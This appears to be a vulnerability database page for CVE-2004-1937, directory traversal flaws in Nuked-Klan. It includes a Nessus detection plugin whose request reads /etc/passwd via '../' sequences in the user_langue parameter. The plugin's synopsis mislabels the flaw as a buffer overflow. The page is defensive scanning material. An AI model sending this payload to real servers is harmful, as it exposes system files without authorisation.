Vulnerabilities > CVE-2004-1937 - Unspecified vulnerability in Nuked-Klan

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
nuked-klan
nessus
exploit available

Summary

Multiple directory traversal vulnerabilities in Nuked-KlaN 1.4b and 1.5b allow remote attackers to read or include arbitrary files via .. sequences in (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter, as demonstrated by modifying $nuked[prefix] in the Suggest module.

Exploit-Db

descriptionNuked-Klan 1.x Multiple Vulnerabilities. CVE-2004-1937. Webapps exploit for php platform
idEDB-ID:23988
last seen2016-02-02
modified2004-04-12
published2004-04-12
reporterfrog
sourcehttps://www.exploit-db.com/download/23988/
titleNuked-Klan 1.x - Multiple Vulnerabilities

Nessus

NASL familyCGI abuses
NASL idNUKED_KLAN_FILE_INCLUDE.NASL
descriptionNuked-klan is installed on the remote host. There is a bug in this version that could allow an attacker to include php files hosted on a third-party website, thus allowing an attacker to execute arbitrary commands on this host. Another bug allows an attacker to read arbitrary files on the remote host.
last seen2020-06-01
modified2020-06-02
plugin id12202
published2004-04-13
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12202
titleNuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#

include( 'compat.inc' );

if (description)
{
  script_id(12202);
  script_version ("1.18");
  script_cve_id("CVE-2004-1937");
  script_bugtraq_id(10104);

  script_name(english:"Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access");
  script_summary(english:"Determine if Nuked-klan is vulnerable to a file include attack");

  script_set_attribute(
    attribute:'synopsis',
    value:'The remote service is prone to a heap-based buffer overflow.'
  );

  script_set_attribute(
    attribute:'description',
    value:"Nuked-klan is installed on the remote host.

There is a bug in this version that could allow an attacker to include
php files hosted on a third-party website, thus allowing an attacker to
execute arbitrary commands on this host.

Another bug allows an attacker to read arbitrary files on the remote host."
  );

  script_set_attribute(
    attribute:'solution',
    value: "Upgrade Nuked-klan to a version newer than 1.5b."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:W/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(
    attribute:'see_also',
    value:'https://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt'
  );


  script_set_attribute(
    attribute:'see_also',
    value:'https://marc.info/?l=bugtraq&m=108222826225823&w=2'
  );

 script_set_attribute(attribute:"plugin_publication_date", value: "2004/04/13");
 script_cvs_date("Date: 2018/11/15 20:50:18");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
  script_dependencie("find_service1.nasl", "http_version.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);
if(!can_host_php(port:port))exit(0);

foreach d (cgi_dirs())
{
 url = string(d, "/index.php?user_langue=../../../../../../../../../../etc/passwd");
 w = http_send_recv3(method:"GET", item:url, port:port);
 if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
 buf = strcat(w[0], w[1], '\r\n', w[2]);

 if ( egrep(pattern:"root:.*:0:[01]:", string:buf) )
   {
    security_hole(port:port);
    exit(0);
   }
}